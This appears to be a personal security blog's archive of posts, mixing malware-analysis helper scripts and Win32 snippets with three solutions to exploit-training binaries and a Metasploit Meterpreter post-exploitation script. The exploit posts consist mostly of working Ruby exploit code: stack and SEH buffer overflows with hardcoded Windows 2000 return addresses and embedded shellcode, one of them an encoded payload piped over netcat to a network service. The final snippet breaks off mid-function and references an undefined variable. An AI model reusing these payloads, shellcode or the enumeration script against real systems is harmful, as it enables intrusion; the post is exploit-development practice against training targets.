22
Jan
2010

Tool: virustotal.rb

Last year at BlackHat I had some free time on the plane and wrote this script for querying Virustotal for anti virus results on a large number of files. I lost this particular script and wrote a different one for a project at work. Now that I have found this one again, I am posting it up for consumption to help out anyone doing malware analysis. Below is an example of the output, there is standard text output and xml output. Questions? Comments? Bugs? Let me know and I will take a look.

usage

[hammackj@taco:~/projects/reverse/trunk/virustotal]$ ./virustotal.rb
virustotal.rb v1.0
Jacob Hammack
http://www.hammackj.com

[*] Usage: ./virustotal.rb [mode] <options> [targets]

Modes:
    -x, --xml-output                 Print results as xml to stdout
    -f, --search-file FILE           Searches a file of hashes on virus total
    -s, --search-hash HASH           Searches a single hash on virus total
    -h, --help                       Show this message

[hammackj@taco:~/projects/reverse/trunk/virustotal]$ ./virustotal.rb -f testhashes.txt 
deb2d2527f2bc85a01df628dcb299b08: Scanner: eSafe Result: Win32.TrojanHorse
694e9bc2ade4f30c99d8a59340307e1a: Scanner: - Result: Not Found
4c0f0b57de8c1669aa6f49d285b3865a: Scanner: - Result: Not Found
cb28c0119a39a215dc58e1af05a50bef: Scanner: - Result: Not Found
44e3c404eff8a62ecb4679041a8e9aea: Scanner: - Result: Not Found
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: a-squared Result: Net-Worm.Win32.Kido!IK
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: AhnLab-V3 Result: Win32/Conficker.worm.62976
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: AntiVir Result: Worm/Conficker.AC
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Authentium Result: W32/Downldr2.EXAE
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Avast Result: Win32:Kido-D
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: AVG Result: Worm/Generic_c.YH
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: BitDefender Result: Win32.Worm.Downadup.Gen
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: CAT-QuickHeal Result: I-Worm.Kido.dam.y
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Comodo Result: NetWorm.Win32.Kido.ih3
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: DrWeb Result: Win32.HLLW.Shadow.5
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: eTrust-Vet Result: Win32/Conficker.B
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: F-Prot Result: W32/Downldr2.EXAE
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: F-Secure Result: Worm:W32/Downadup.AB
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Fortinet Result: W32/Conficker.A!worm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: GData Result: Win32.Worm.Downadup.Gen
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Ikarus Result: Net-Worm.Win32.Kido
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Jiangmin Result: TrojanDownloader.Agent.axwm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: K7AntiVirus Result: Trojan-Downloader.Win32.Agent.aqfw
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Kaspersky Result: Net-Worm.Win32.Kido.dam.y
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: McAfee Result: W32/Conficker.worm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: McAfee+Artemis Result: Artemis!D9CB288F3171
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: McAfee-GW-Edition Result: Worm.Conficker.AC
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Microsoft Result: Worm:Win32/Conficker.A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: NOD32 Result: Win32/Conficker.A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Norman Result: Conficker.HB
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: nProtect Result: Trojan-Exploit/W32.MS08-067.62976
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Panda Result: W32/Conficker.A.worm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: PCTools Result: Trojan-Downloader.Agent
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Prevx Result: High Risk Worm
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Rising Result: Hack.Exploit.Win32.MS08-067.k
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Sophos Result: W32/Confick-A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Sunbelt Result: Worm.Win32.Downad.A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: Symantec Result: W32.Downadup
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: TheHacker Result: Trojan/Downloader.Agent.aqfw
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: TrendMicro Result: WORM_DOWNAD.A
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: VBA32 Result: Worm.Win32.kido.58
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: ViRobot Result: Trojan.Win32.Downloader.62976.AJ
5815B13044FC9248BF7C2DBA771F0E6496D9E536: Scanner: VirusBuster Result: Worm.Conficker.BE

Download virustotal.rb

 

Posted by hammackj

no comments


17
Jan
2010

Solution: awbo3.exe - Windows 2000 SP4 R1

After a very hectic week I was able to sit down and work on awbo3.exe from the SourceFire VRT Labs. Since the rules state no static return stack addresses or noop sleds it took me a little bit longer to get this one working correctly. I had to get an assist on the backwards jump from mc but once I figured that trick out it was easy. I don't have a copy of Windows XP Sp2 installed, but I will post the solution for that XP as soon as I can get SP2 installed. I have the noop slide version commented out below it was a bit easier to make than the specific spacing version, and it probably more reliable also. If anyone is interested in the details of how this SEH overflow worked let me know and I will write up a detailed post and how everything worked.

awbo3-exploit.rb

#!/usr/bin/env ruby

#Jacob Hammack
#jacob.hammack@hammackj.com
#exploit for awbo3.exe from Sourcefire VRT labs, Windows 2000 SP4 Rollup 1

poppopret = [0x77fb3326].pack('V') #ntdll.dll pop esi pop ebx ret, w2ksp4r1

#121, metasploit exec calc.exe
shellcode = 
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

nseh = "\xEB\x06\x90\x90"
seh = poppopret
stage1 = [0xe8, -1024].pack('CV') #thx mc~

#Vuln tiggers at 1084 so, we need a buffer padding before the shellcode, in this case is 120 bytes
#then the shellcode and the rest of buffer in a's so 843 for the rest of 1084
payload = "A" * 120 + shellcode + "A"  * 843 + nseh + seh + stage1
#payload ="\x90" * (1084 - shellcode.length) + shellcode  + nseh + seh + stage1

print payload

 

Posted by hammackj

no comments


3
Jan
2010

Solution: awbo2.exe

I was feeling bored on Saturday after the wif went to bed so I took a crack at the SourceFire VRT labs Advanced Windows Buffer Overflows. I started with the first one; below is the solution in ruby. The shellcode is provided on the Sourcefire website and all it does it exec calc.exe. This series of executables seems to be all local exploits with int3 staged for ease of debugging. Most of my time was spent in the debugger getting the space just right. I will post the rest of the solutions soon. Any questions? 

exploit.rb

#!/usr/bin/env ruby

#Jacob Hammack
#http://www.hammackj.com

read = [0x7C571931].pack('V') #kernel32 ADD BYTE PTR DS:[EAX],CL
jmpesp = [0x7C5725F3].pack('V') #kernel32 jmp esp


shellcode = 
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

print 'A' * 1024 + read + "JUNK" + jmpesp + shellcode


usage

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>ruby exploit.rb | awbo2.exe

Then in your post mortem debugger will catch the int3 at the beginning of the program and click run and you might have this screen, the addresses are only valid on Windows 2000 SP4 Rollup 1, I provided the instructions to find if you want to try and get it to work on anything else. I have not tried on anything except my VM.

awbo2pwnage

 

Posted by hammackj

no comments


1
Jan
2010

Tool: aviraparser.rb

So a while back I downloaded and setup the Avira Professional Beta for linux, it is a really good product for finding malware. This product has two downsides 1) it does not work on powerpc and 2) the logs are in a lame text format. So I needed was a way to parse all the endless logs from the binaries I have collected to see if anything was interesting enough to go ahead and RE the malicious code. So here is a simple script that will parse the raw Avira logs and write the results to screen for easy viewing. The version I use in production is built into a rails app and to complex too post here. Sorry.

aviraparser.rb

#!/usr/bin/env ruby
#Jacob Hammack
#http://www.hammackj.com
#Ruby parser for the output of the Avira Professional for linux results

#This script assumes filenames are the sha1 hash of the file
#to change this 

f = File.new(ARGV[0])

f.each { |line| 
  lines = line.split(':')

  date = lines[0]
  time = lines[1]
  time1 = lines[2]
  av = lines[3]
  type = lines[4]
  result = lines[5]
  results = Array.new

  printf "Date: %s:%s:%s\n", date, time, time1
  printf "AntiVirus: %s\n", av

  if type =~ /WARNING .*\/([0-9a-fA-F]{40})(.*)/
    type = $1
    result = $2
    result[0] = ' '
    result.strip!
    printf "Filename: %s\n", type
    printf "Result: %s\n", result
  elsif type =~ /ALERT .*\/([0-9a-fA-F]{40})/
    type = $1
    printf "filename: %s\n", type
    result.scan(/(.*);(.*);(.*)/) { |s, c, d|
      printf "Shortname: %s\n", s
      printf "Category: %s\n", c
      printf "Description: %s\n", d        
    }
  end

  puts "\n"
}

output

[hammackj@fajitas:~/Desktop]$ ./avguparser.rb filescan-20090615.log

Date: 2009-06-15 13:41:25 hoss avscan[21821]
AntiVirus:  AVGU

Date: 2009-06-15 13:41:40 hoss avscan[21821]
AntiVirus:  AVGU
filename: 00A66A90C0B2ECC0DEB975BE1F47526FD598D4A0
Shortname:  TR/Agent.225280.I 
Category:  trojan 
Description:  Is the Trojan horse TR/Agent.225280.I

Date: 2009-06-15 13:41:41 hoss avscan[21821]
AntiVirus:  AVGU
filename: 00B224187CE4C7E378E954DB76D1AF86DDF1403B
Shortname:  ADSPY/Mywebsearch.AN.2 
Category:  adware 
Description:  Contains detection pattern of the Ad- or Spyware ADSPY/Mywebsearch.AN.2

hammackj@fajitas:~/Desktop]$

 

Posted by hammackj

no comments


27
Jan
2009

Meterpeter Script: usbenum.rb

Last week I was looking around the Metasploit ticket system looking for something that I could do to contribute back to the community that has made pen testing so easy for everyone. I found ticket 700. A simple meterpeter script to enumerate USB device information on the remote computer. I based it off the winenum.rb script from Carlos Perez, so its very similar to that script. I am sure this script could be cleaned up some to be shorter but I only spent about an hour on it. Questions? Comments? Post em up... 
usbenum.rb

#
#Meterpreter script for basic usb device enumeration
#Based on the winenum.rb script by Carlos Perez
#Provided by Jacob Hammack at jacob.hammack[at]hammackj.com
#Verion: 0.0.1

@client = client
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-a" => [ false, "Enumerate all connected usb devices" ],
  "-s" => [ false, "Enumerate all connected usb storage devices" ]
)

allUsb = false
usbStor = false

opts.parse(args) { |opt, idx, val|
  case opt
    when "-a"
      allUsb = true
    when "-s"
      usbStor = true      
    when "-h"
      print_line "USBEnum -- Enumerates all USB devices"
      print_line
      print_line "Retrieves information about the usb devices that have been connected"
      print_line "to the system. Results are stored in #{::File.join(Msf::Config.log_directory, 'usbenum')}"
      print_line(opts.usage)
      raise Rex::Script::Completed
  end
}

host,port = @client.tunnel_peer.split(':')
info = @client.sys.config.sysinfo
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))

# Create a directory for the logs
logs = ::File.join(Msf::Config.log_directory, 'usbenum', info['Computer'] + filenameinfo )

# Create the log directory
::FileUtils.mkdir_p(logs)

#logfile name
dest = logs + "/" + info['Computer'] + filenameinfo + ".txt"

#Enumerates a registry key and returns
#Jacked from the winenum.rb script by carlos perez
def reg_enumkeys(key)
  subkeys = []
  begin
    root_key, base_key = @client.sys.registry.splitkey(key)
    open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
    keys = open_key.enum_key
    keys.each { |subkey|
      subkeys << subkey
    }
    open_key.close
  rescue ::Exception => e
    return nil
  end
  return subkeys
end

#Gets a reg key value
#Jacked from the winenum.rb script by carlos perez
def reg_getvaldata(key,valname)
  value = nil
  begin
    root_key, base_key = @client.sys.registry.splitkey(key)
    open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
    v = open_key.query_value(valname)
    value = v.data
    open_key.close
  rescue ::Exception => e
    return nil
  end
  return value
end

#writes out data to file
#Jacked from the winenum.rb script by carlos perez
def filewrt(file2wrt, data2wrt)
  output = ::File.open(file2wrt, "a")
  data2wrt.each_line do |d|
    output.puts(d)
  end
  output.close
end

allUsbKey = "HKLM\\System\\CurrentControlSet\\Enum\\USB\\"
usbStorKey = "HKLM\\System\\CurrentControlSet\\Enum\\USBStor\\"

if allUsb == true or usbStor == true
  print_status("Running Windows USB Enumerion Meterpreter Script")
  info = @client.sys.config.sysinfo
  header =  "Date:       #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
  header << "Running as: #{@client.sys.config.getuid}\n"
  header << "Host:       #{info['Computer']}\n"
  header << "OS:         #{info['OS']}\n"
  header << "\n\n\n"

  print_status("Saving report to #{dest}")
  filewrt(dest, header)
end

if allUsb == true
  begin
    subkeys = reg_enumkeys(allUsbKey)

    subkeys.each { |key|
      devices = reg_enumkeys(allUsbKey + key)  
      devices.each { |dev|        
        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "HardwareID")
        hardwareid = "HardwareID:" + val unless val == nil

        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "Driver")
        driver = "Driver:" + val unless val == nil

        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "ClassGUID")
        classguid = "ClassGUID:" + val unless val == nil

        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "Mfg")
        mfg = "mfg:" + val unless val == nil

        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "DeviceDesc")
        devicedesc = "DeviceDesc:" + val unless val == nil

        val = reg_getvaldata(allUsbKey + key + "\\" + dev + "\\", "LocationInformation") 
        locationinformation = "LocationInformation:" + val unless val == nil

        print_status hardwareid unless hardwareid == nil
        print_status driver unless driver == nil
        print_status classguid unless classguid == nil
        print_status mfg unless mfg == nil
        print_status devicedesc unless devicedesc == nil
        print_status locationinformation unless locationinformation == nil
        print_status ""
        
        filewrt(dest, hardwareid + "\n") unless hardwareid == nil
        filewrt(dest, driver + "\n") unless driver == nil
        filewrt(dest, classguid + "\n") unless classguid == nil
        filewrt(dest, mfg + "\n") unless mfg == nil
        filewrt(dest, devicedesc + "\n") unless devicedesc == nil
        filewrt(dest,  locationinformation + "\n") unless locationinformation == nil
        filewrt(dest, "\n")
      }
    }
  rescue ::Exception => e
    print_status("Unable to enumerate USB registry #{e}")
  end
end

if usbStor == true
  begin
    subkeys = reg_enumkeys(usbStorKey)

    subkeys.each { |key|
      devices = reg_enumkeys(usbStorKey + key)  
      devices.each { |dev|        
        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "HardwareID")
        hardwareid = "HardwareID:" + val unless val == nil

        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "Driver")
        driver = "Driver:" + val unless val == nil

        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "ClassGUID")
        classguid = "ClassGUID:" + val unless val == nil

        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "Mfg")
        mfg = "mfg:" + val unless val == nil

        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "DeviceDesc")
        devicedesc = "DeviceDesc:" + val unless val == nil

        val = reg_getvaldata(usbStorKey + key + "\\" + dev + "\\", "FriendlyName") 
        friendlyname = "FriendlyName:" + val unless val == nil

        print_status hardwareid unless hardwareid == nil
        print_status driver unless driver == nil
        print_status classguid unless classguid == nil
        print_status mfg unless mfg == nil
        print_status devicedesc unless devicedesc == nil
        print_status friendlyname unless friendlyname == nil
        print_status ""
        
        filewrt(dest, hardwareid + "\n") unless hardwareid == nil
        filewrt(dest, driver + "\n") unless driver == nil
        filewrt(dest, classguid + "\n") unless classguid == nil
        filewrt(dest, mfg + "\n") unless mfg == nil
        filewrt(dest, devicedesc + "\n") unless devicedesc == nil
        filewrt(dest, friendlyname + "\n") unless friendlyname == nil
        filewrt(dest, "\n")
      }
    }
  rescue ::Exception => e
    print_status("Unable to enumerate USB registry #{e}")
  end
end

 

Posted by hammackj

no comments


26
Jan
2009

Tool: checkip.rb

Often I find my self in need of accessing my home network for various reasons but the IP address changes more often than not. So I wrote this little script, that will connect to whatismyip.com and email me if the IP has changed. I also setup a crontab entry that will run the script every hour to look for ip address changes. The code and the crontab are posted below if anyone feels they could use the script. Please let me know if there are any errors or if you need help.

checkip.rb

#!/usr/bin/env ruby

#Jacob Hammack
#http://www.hammackj.com
#checkip.rb is a tool to check the internet facing ip and emailing a specific user if the ip changes from the previously noted ip

require 'rubygems'
require 'open-uri'
require 'hpricot' #sudo gem install hpricot
require 'net/smtp'

$FROM_EMAIL = "FROMEMAILADDRESSHERE"
$TO_EMAIL = "TOEMAILADDRESSHERE"

# read_ip () reads the locally stored .checkip file for the last known ip
#
def read_ip()
  ip = ""
  begin
    File.open(".checkip", "r") { |f| ip = f.gets() }
  rescue => err
    #file doesn't exist, can ignore it
  end

  return ip
end

# main() checks teh whatismyip.com website for changes in ip address stored locally
#
def main()
  puts "checkip.rb\nJacob Hammack\nhttp://www.hammackj.com\n"

  new_ip = Hpricot(open("http://www.whatismyip.com/automation/n09230945.asp"))
  new_ip = new_ip.html.chomp
  ip = read_ip()
  ip.chomp! unless ip == nil

  if new_ip != ip
    puts "[!] Different IP Address Detected emailing admin!"
    email_admin(new_ip)
    File.open(".checkip", "w") { |f| f.puts new_ip }
  else
    puts "[*] No IP change"
  end
end

# email_admin(ip) sends a email to the $TO_EMAIL variable using a local sendmail mta
#
def email_admin(ip)
  msg = sprintf "From: checkip.rb <%s>\nTo: %s <%s>\nSubject: Your IP has been updated!\nDate: %s\nMessage-Id: <%s@hammackj.net>\n\nYour IP address has changed to %s\n", $FROM_EMAIL, $FROM_EMAIL, $TO_EMAIL, Time.now, ip, ip

  Net::SMTP.start('localhost', 25) do |smtp|
    smtp.send_message msg, $FROM_EMAIL, $TO_EMAIL
  end
end

main()

crontab -l

[hammackj@frijoles:/opt/scripts]# sudo crontab -l
# m h  dom mon dow   command
0 * * * * /usr/bin/ruby /opt/scripts/checkip.rb

 

Posted by hammackj

no comments


23
Jan
2009

Solution to homework.exe

This is the solution to the http://pentest.cryptocity.net/exploitation/ homework.exe that was posted. The videos are great, a must watch for anyone that wants try exploit development. Just a simple ruby script, only works vs windows 2000sp4r1 only VM I had access to. 
exploit.rb
#!/usr/bin/env ruby

#usage ./exploit.rb | nc ip homework.exe 1974

require 'socket'

#2000 SP4 Rollup 1
JMP_ESP = [0x77F81BE3].pack('V')
NOP = "\x90"
USERNAME = "poly"
PASSWORD = "teknik"
PAYLOAD = 
  "\x33\xc9\xb1\x56\xbb\x79\xaa\x11\x96\xd9\xf6\xd9\x74\x24" +
  "\xf4\x5f\x31\x5f\x10\x03\x5f\x10\x83\xc7\x04\x9b\x5f\xed" +
  "\x7e\xd2\xa0\x0e\x7f\x84\x29\xeb\x4e\x96\x4e\x7f\xe2\x26" +
  "\x04\x2d\x0f\xcd\x48\xc6\x84\xa3\x44\xe9\x2d\x09\xb3\xc4" +
  "\xae\xbc\x7b\x8a\x6d\xdf\x07\xd1\xa1\x3f\x39\x1a\xb4\x3e" +
  "\x7e\x47\x37\x12\xd7\x03\xea\x82\x5c\x51\x37\xa3\xb2\xdd" +
  "\x07\xdb\xb7\x22\xf3\x51\xb9\x72\xac\xee\xf1\x6a\xc6\xa8" +
  "\x21\x8a\x0b\xab\x1e\xc5\x20\x1f\xd4\xd4\xe0\x6e\x15\xe7" +
  "\xcc\x3c\x28\xc7\xc0\x3d\x6c\xe0\x3a\x48\x86\x12\xc6\x4a" +
  "\x5d\x68\x1c\xdf\x40\xca\xd7\x47\xa1\xea\x34\x11\x22\xe0" +
  "\xf1\x56\x6c\xe5\x04\xbb\x06\x11\x8c\x3a\xc9\x93\xd6\x18" +
  "\xcd\xf8\x8d\x01\x54\xa5\x60\x3e\x86\x01\xdc\x9a\xcc\xa0" +
  "\x09\x9c\x8e\xac\xfe\x92\x30\x2d\x69\xa5\x43\x1f\x36\x1d" +
  "\xcc\x13\xbf\xbb\x0b\x53\xea\x7b\x83\xaa\x15\x7b\x8d\x68" +
  "\x41\x2b\xa5\x59\xea\xa0\x35\x65\x3f\x66\x66\xc9\x90\xc6" +
  "\xd6\xa9\x40\xae\x3c\x26\xbe\xce\x3e\xec\xc9\xc9\xf0\xd4" +
  "\x99\xbd\xf0\xea\x0c\x61\x7c\x0c\x44\x89\x28\x86\xf1\x6b" +
  "\x0f\x1f\x65\x94\x65\x33\x3e\x02\x31\x5d\xf8\x2d\xc2\x4b" +
  "\xaa\x82\x6a\x1c\x39\xc8\xae\x3d\x3e\xc5\x86\x34\x06\x8d" +
  "\x5d\x29\xc4\x2c\x61\x60\xbe\xcd\xf0\xef\x3f\x98\xe8\xa7" +
  "\x68\xcd\xdf\xb1\xfd\xe3\x46\x68\xe0\xfe\x1f\x53\xa0\x24" +
  "\xdc\x5a\x28\xa9\x58\x79\x3a\x77\x60\xc5\x6e\x27\x37\x93" +
  "\xd8\x81\xe1\x55\xb3\x5b\x5d\x3c\x53\x1a\xad\xff\x25\x23" +
  "\xf8\x89\xca\x95\x55\xcc\xf5\x19\x32\xd8\x8e\x44\xa2\x27" +
  "\x45\xcd\xc2\xc5\x4c\x3b\x6b\x50\x05\x86\xf6\x63\xf3\xc4" +
  "\x0e\xe0\xf6\xb4\xf4\xf8\x72\xb1\xb1\xbe\x6f\xcb\xaa\x2a" +
  "\x90\x78\xca\x7e\x9a"

boom = USERNAME + ":" + PASSWORD + "A" * 117 + JMP_ESP + NOP * 500 + PAYLOAD + "\r\n"

puts boom + "\r\n"

 

Posted by hammackj

no comments


14
Jan
2009

List Windows File System Recursively

In a few of the tools that I have written, I have needed to list the windows file system recursively. While .Net makes this much easier, all of the tools I write are in win32 C. Hopefully this will help someone else, as when I looked for information on this I did not find very much. 

static void RecurseFileSystem(TCHAR *StartingPath)
{
    HANDLE CurrentFileHandle;
    WIN32_FIND_DATA FileInformation;
    TCHAR CurrentFileName[MAX_PATH];
    TCHAR m_szFolderInitialPath[MAX_PATH];
    TCHAR wildCard[MAX_PATH] = TEXT("\\*.*");
 
    _tcscpy_s(CurrentFileName, MAX_PATH, StartingPath);
    _tcscpy_s(m_szFolderInitialPath, MAX_PATH, StartingPath);
    _tcsncat_s(m_szFolderInitialPath, MAX_PATH, wildCard, MAX_PATH);
 
    CurrentFileHandle = FindFirstFile(m_szFolderInitialPath, &FileInformation);
 
    if(CurrentFileHandle != INVALID_HANDLE_VALUE)
    {
        do
        {
            if((_tcscmp( FileInformation.cFileName, TEXT(".") ) != 0) && (_tcscmp(FileInformation.cFileName, TEXT("..")) != 0))
            {
                _tcscpy_s(CurrentFileName, MAX_PATH, StartingPath);
                _tcsncat_s(CurrentFileName, MAX_PATH, TEXT("\\/**/"), MAX_PATH);
                _tcsncat_s(CurrentFileName, MAX_PATH, FileInformation.cFileName, MAX_PATH);
 
                if(FileInformation.dwFileAttributes &FILE_ATTRIBUTE_DIRECTORY)
                {
                   //For some odd reason wordpress dies if i remove the space in the function call below..
                    RecurseFileSystem (CurrentFileName);
                }
                else
                {
                    /* Do action on file here! */
                }
            }
        }
        while(FindNextFile(CurrentFileHandle, &FileInformation) == TRUE);
 
        FindClose(CurrentFileHandle);
    }
}

 

Posted by hammackj

no comments


7
Jan
2009

Simple Win32 Window

I seem to always need this skeleton code to build a window but I can never seem to memorize the whole thing. I figured I would post it here to make it easier for me to find. The #programa comments are not cross platform and only work on Microsoft based compilers, so watch out.

/**
 * SimpleWindow v1.0
 * @file
 *
 * 09-24-2008:  JPH - Created.
 *
 * @author Jacob Hammack
 */
 
#include <windows.h>
 
/**
 * Forces the compiler to link these libraries
 *
 */
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "kernel32.lib")
 
/**
 * WindowsMessageLoop processes 
 *
 * @author Jacob Hammack
 */
LRESULT CALLBACK WindowsMessageLoop(HWND WindowHandle, UINT Message, WPARAM WindowParameters, LPARAM MoreWindowsParameters)
{
  switch(Message)
  {
    case WM_CREATE:
      return 0;
 
    case WM_PAINT:
      return 0;
 
    case WM_SIZE:
      return 0;
 
    case WM_DESTROY:
      PostQuitMessage(0);
      return 0;
  }
 
  return DefWindowProc(WindowHandle, Message, WindowParameters, MoreWindowsParameters);
}
 
/**
 * WinMain is the main() equivilent for a windows program, execution starts here.
 *
 * @author Jacob Hammack
 */
int WINAPI WinMain (HINSTANCE CurrentInstance, HINSTANCE PreviousInstance,  PSTR CommandLine, int CommandShow)
{
  static TCHAR ApplicationName[] = TEXT("SimpleWindow");
  HWND WindowHandle;
  MSG Message;
  WNDCLASS WindowsClass;
 
  WindowsClass.style = CS_HREDRAW | CS_VREDRAW;
  WindowsClass.lpfnWndProc = WindowsMessageLoop;
  WindowsClass.cbClsExtra = 0;
  WindowsClass.cbWndExtra = 0;
  WindowsClass.hInstance = CurrentInstance;
  WindowsClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
  WindowsClass.hCursor = LoadCursor(NULL, IDC_ARROW);
  WindowsClass.hbrBackground = (HBRUSH) GetStockObject(WHITE_BRUSH);
  WindowsClass.lpszMenuName = NULL;
  WindowsClass.lpszClassName = ApplicationName;
 
  if(!RegisterClass(&WindowsClass))
  {
    MessageBox(NULL, TEXT("Unable to create a window."), ApplicationName, MB_ICONERROR);
 
    return 0;
  }
 
    WindowHandle = CreateWindow(ApplicationName,        /* Window Class Name*/
                                TEXT("Simple Window"),  /* Window Caption */
                                WS_OVERLAPPEDWINDOW,    /* Window Style*/
                                CW_USEDEFAULT,          /* Initial X position*/
                                CW_USEDEFAULT,          /* Initial Y position */
                                300,                    /* Initial Width of the window*/
                                100,                    /* Initial Height of the window */
                                NULL,                   /* Parent Window Handle */
                                NULL,                   /* Window Menu Handle */
                                CurrentInstance,        /* Instance of the Program Handle*/
                                NULL);                  /* Window Creation Parameters */
 
  ShowWindow(WindowHandle, CommandShow);
  UpdateWindow(WindowHandle);
 
  while(GetMessage(&Message, NULL, 0, 0))
  {
    TranslateMessage(&Message);
    DispatchMessage(&Message);
  }
 
  return Message.wParam;
}

Makefile
CC=cl
CFLAGS= /nologo /MT /O2 /TC
LINKS=/link /OUT:simplewindow.exe /SUBSYSTEM:WINDOWS
 
all: simplewindow 
 
simplewindow: simplewindow.c
  $(CC) $(CFLAGS) simplewindow.c $(LINKS)
 
clean:
  del *.exe; del *.obj

a_window_00

 

Posted by hammackj

no comments


30
Jan
2009

Extracting binary resources in win32

Here is a useful snippet for extracting a binary resource from a compiled resource in a exe or dll. I haven\'t really seen any thing demonstrates how to do this exactly. So hopefully this helps someone. Maybe next time I will post the code to extract into memory and execute a PE file.

/**
 * Extracts a binary resource and write it to the specified output file.
 *
 * @param output_filename filename of the output file
 * @param resource_id resource id of object to extract from the resource file
 *
 * @author Jacob Hammack
 *
 */
void extract_resource(TCHAR *output_filename, int resource_id)
{
  HGLOBAL resource_handle = NULL;
  HANDLE file_handle;
  HRSRC resource;
  TCHAR *resource_data;
  DWORD resource_size;
  DWORD bytes_written = 0;
 
  if(!(resource = FindResource(0, MAKEINTRESOURCE(resource_id), RT_RCDATA))
  {
    return;
  }
 
  if(!(res_handle = LoadResource(NULL, resource)))
  {
    return;
  }
 
  resource_data = (TCHAR*) LockResource(resource_handle);
  resource_size = SizeofResource(NULL, resource);
 
  file_handle = CreateFile(output_filename, GENERIC_WRITE, FILE_SHARE_WRITE,0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
 
  if(file_handle == INVALID_HANDLE_VALUE)
  {
